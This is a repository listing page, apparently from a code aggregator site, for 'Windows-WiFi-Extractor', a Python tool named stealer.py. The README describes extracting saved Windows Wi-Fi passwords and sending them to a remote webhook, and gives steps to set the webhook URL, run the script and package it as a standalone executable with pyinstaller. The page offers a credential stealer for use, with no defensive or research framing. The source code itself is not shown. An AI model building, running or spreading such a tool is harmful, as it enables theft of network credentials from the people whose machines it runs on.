• Stars
    star
    243
  • Rank 166,489 (Top 4 %)
  • Language
    Python
  • Created over 2 years ago
  • Updated over 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Extract Windows Wi-Fi Passwords to Remote URL

Windows-WiFi-Extractor

Extract Windows Wi-Fi Passwords to a Remote URL

Install

Before running, install the required modules:

pip3 install -r requirements.txt

Usage

To use, simply replace the url variable with your webhook and execute the following:

python stealer.py

Making an executable

If you want to be a fancy pants, you can convert this to an exe :)

pyinstaller --onefile stealer.py